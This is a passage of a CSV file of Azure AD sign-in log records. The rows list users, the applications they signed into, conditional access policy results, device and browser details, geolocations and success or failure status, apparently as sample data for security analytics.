33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,a9f59943-bd83-455b-86cd-4cf1d4fe1400,SigninLogs,Sucess,33.7984581,-84.38828278
+674,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:01.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a832678c-5525-45b8-9da0-bb1eca192ad3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a9f59943-bd83-455b-86cd-4cf1e8fe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a9f59943-bd83-455b-86cd-4cf1e8fe1400,SigninLogs,Sucess,33.7984581,-84.38828278
+675,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,bd16479f-8045-0000-5683-424995b0e98c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",2b6dd05c-6ab3-47f4-b023-40d0a9631300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,2b6dd05c-6ab3-47f4-b023-40d0a9631300,SigninLogs,Failed,33.7984581,-84.38828278
+676,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:04.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fcceb343-20eb-4ea6-b80b-39ea582ffdee,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",fb48d823-caf0-47e0-9da1-4189d83e1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fb48d823-caf0-47e0-9da1-4189d83e1400,SigninLogs,Sucess,50.6406517,5.572050095
+677,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21b74ec9-9475-45e3-963b-6d387039b5ea,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",459ca702-517f-41c3-88f0-2f42b1e41300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,459ca702-517f-41c3-88f0-2f42b1e41300,SigninLogs,Sucess,33.7984581,-84.38828278
+678,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99590dcb-8cbb-48df-895d-bd8a24a4b360,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4aed1172-3ed3-4e97-ac91-0186f6151500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aed1172-3ed3-4e97-ac91-0186f6151500,SigninLogs,Sucess,33.7984581,-84.38828278
+679,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:19.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79ff270d-e8b3-4118-98b4-5b461bb60e76,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",9ded9a0a-16d2-4e98-93fd-ae8c9b441400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9ded9a0a-16d2-4e98-93fd-ae8c9b441400,SigninLogs,Sucess,36.6404686,-78.26995087
+680,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:17.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c27bb27f-6b5f-4aa7-85e4-b0d8060c1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c27bb27f-6b5f-4aa7-85e4-b0d8060c1400,SigninLogs,Sucess,50.6406517,5.572050095
+681,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:04.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fcceb343-20eb-4ea6-b80b-39ea582ffdee,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",fb48d823-caf0-47e0-9da1-4189d83e1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fb48d823-caf0-47e0-9da1-4189d83e1400,SigninLogs,Sucess,50.6406517,5.572050095
+682,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:25.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5561cabe-aaad-412e-bbf2-ad9151c34155,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 